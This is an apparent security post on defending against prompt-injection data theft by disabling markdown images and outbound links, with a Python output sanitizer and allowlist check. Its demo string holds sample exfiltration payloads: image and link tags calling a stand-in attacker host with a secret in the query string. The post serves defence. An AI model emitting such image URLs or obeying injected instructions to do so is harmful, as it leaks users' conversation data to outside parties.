Mitigating Prompt Injection: Disable Markdown Images and Links

While prompt injection remains unsolved, for this particular issue there is a known mitigation: don't ever support markdown (or HTML) images that load images from domains you do not control! More painful but also necessary: don't support outbound clickable links either.
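To make the mitigation concrete, here is an added example (not code from the original post or from any particular product) of a pre-render filter for LLM output in Markdown: image references whose host is not on an allowlist of domains you control are replaced with a placeholder, and every clickable link, whether Markdown `[text](url)` or raw `<a>`, is reduced to its visible text. The `example.com` allowlist entry and the sample strings are constructed for the demonstration. Relative paths are allowed because they load from your own origin; `data:`, `javascript:` and scheme-relative `//host` URLs are blocked.

```python
import re
from urllib.parse import urlparse

# Domains this application controls; hypothetical value for the example.
ALLOWED_IMAGE_DOMAINS = ("example.com",)

# Inline Markdown image:  ![alt](url "title")
_MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^\s)>]*)>?(?:\s+"[^"]*")?\s*\)')
# Inline Markdown link:   [text](url "title")   (not preceded by '!')
_MD_LINK = re.compile(r'(?<!!)\[([^\]]*)\]\(\s*<?([^\s)>]*)>?(?:\s+"[^"]*")?\s*\)')
# Raw HTML that a permissive Markdown renderer would pass through
_HTML_IMG = re.compile(r'<img\b[^>]*>', re.IGNORECASE)
_HTML_SRC = re.compile(r'''src\s*=\s*["']?([^"'\s>]+)''', re.IGNORECASE)
_HTML_LINK = re.compile(r'<a\b[^>]*>(.*?)</a>', re.IGNORECASE | re.DOTALL)


def image_url_allowed(url: str, allowed=ALLOWED_IMAGE_DOMAINS) -> bool:
    """True only for plain relative paths or http(s) URLs on a controlled domain."""
    parsed = urlparse(url.strip())
    if parsed.scheme == "":
        # '/static/x.png' is fine; '//evil.example.net/x.png' is scheme-relative and is not
        return parsed.netloc == ""
    if parsed.scheme not in ("http", "https"):
        return False  # data:, javascript:, file:, ...
    host = parsed.hostname
    if host is None:
        return False  # e.g. 'http:evil.example.net/x' resolves differently per base URL
    return any(host == d or host.endswith("." + d) for d in allowed)


def sanitize_markdown(text: str, allowed=ALLOWED_IMAGE_DOMAINS) -> str:
    """Strip exfiltration channels from model output before it is rendered."""

    def md_image(m: re.Match) -> str:
        alt, url = m.group(1), m.group(2)
        return m.group(0) if image_url_allowed(url, allowed) else f"[image blocked: {alt}]"

    def html_img(m: re.Match) -> str:
        src = _HTML_SRC.search(m.group(0))
        return m.group(0) if src and image_url_allowed(src.group(1), allowed) else "[image blocked]"

    text = _MD_IMAGE.sub(md_image, text)
    text = _HTML_IMG.sub(html_img, text)
    # Links: keep the visible text so the answer still reads, but drop the href entirely.
    text = _MD_LINK.sub(lambda m: m.group(1), text)
    text = _HTML_LINK.sub(lambda m: m.group(1), text)
    return text


if __name__ == "__main__":
    # Constructed sample: an injected instruction has made the model emit an image
    # whose query string carries data from the conversation, plus an outbound link.
    sample = (
        "Here is the logo: ![logo](https://cdn.example.com/logo.png) "
        "![x](https://evil.example.net/p?q=SECRET) "
        "See [docs](https://evil.example.net/) "
        '<img src="https://evil.example.net/p?d=SECRET"> <a href="https://evil.example.net/">click</a>'
    )
    print(sanitize_markdown(sample))
```

Run it on the rendered Markdown string before it reaches the browser; the allowlist check is by hostname suffix, so subdomains of a controlled domain pass while look-alike hosts such as `example.com.evil.net` do not. Bare autolinks (a URL pasted without brackets) are best handled by turning off autolinking in the Markdown renderer itself rather than by post-processing.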